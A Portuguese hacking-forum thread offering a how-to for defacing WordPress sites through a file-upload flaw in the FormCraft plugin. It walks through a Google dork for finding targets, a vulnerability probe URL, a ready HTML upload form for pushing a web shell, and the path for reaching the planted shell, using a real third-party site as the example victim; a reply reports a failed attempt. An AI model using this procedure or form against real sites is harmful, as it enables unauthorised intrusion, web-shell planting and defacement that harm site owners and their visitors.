Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Deface com FormCraft

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Exploit Deface com FormCraft

    Boas pessoal,
    Navegando ontem em busca de informações, vi uma forma de dar deface através da plataforma FormCraft, bom segue o tuto ai em baixo!


    - Pesquise por essa dork no Google: "powered by Formcraft"
    - Abra algum site resultado pela busca
    - Para saber se o site está vulnerável a essa falha, vocês vão digitar esse endereço:
    Código HTML:
    wp-content/plugins/formcraft/file-upload/server/php/upload.php
    Após o endereço do site! Exemplo:
    Código HTML:
    Edereço do site: http://lscegypt.net/wp-content/plugins/formcraft/file-upload/server/php/upload.php
    - Se o site escolhido por vocês retornar esse erro: {"failed":"No file found 2"}
    Bingo! O site está vulnerável!
    - Agora vocês abrem o bloco de notas e colem esse script lá:
    Código HTML:
    <form method="POST" action="endereçosite/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
    enctype="multipart/form-data">
    <input type="file" name="files[]" /><button>Upload</button>
    </form>
    - No script, em action="endereçosite" vocês vão subistuir pelo alvo de vocês, que no meu caso é o Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., ficando então: action="http://lscegypt.net/wp-con.....
    - Após acrescentado o endereço, salve o arquivo como HTML, pode colocar qualquer nome, tipo, upload.html, o importante é que esteja em HTML.
    - Abram agora o arquivo que vocês salvaram, vai abrir uma pagina igual a essa:

    - Vocês apertem em escolher arquivo, selecionem sua shell ou arquivo, e cliquem em upload.
    - Eu upei um arquivo chamado: fh.php
    - Na mesma pagina vai aparecer um script parecido com esse:

    - Note que onde eu marquei, tem escrito: "154e5e5259b572---FH.php", que é o endereço que o arquivo está! Copiem esse endereço.
    - Pronto, o vocês já enviaram a shell ou arquivo para o site, agora vamos acessá-los!
    - Na mesma pagina, modifiquem o endereço la em cima "file-upload/server/php/upload.php", troquem esse, por esse: "file-upload/server/php/files/nomedoseuarquivo.php", que no meu caso, fica: "file-upload/server/php/files/154e5e5259b572---FH.php", meu endereço final ficou:
    Código HTML:
    http://lscegypt.net/wp-content/plugins/formcraft/file-upload/server/php/files/154e5e5259b572---FH.php
    E ok, está pronto o sorvetinho . Usem por sua conta e risco!
    Eu não desenvolvi este método, apenas traduzi e melhorei para o Português! qualquer duvida deixem no comentário, esse é meu primeiro post !

    Tutorial Original: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Tudo é precioso para aquele que foi, por muito tempo, privado de tudo.
    Friedrich Nietzsche
    Similar Threads

  • Font Size
    #2
    achei um site no google que aparecesse {"failed":"No file found 2"} mais não upou a shell nao :$


    FanBar

    Comment

    X
    Working...
    X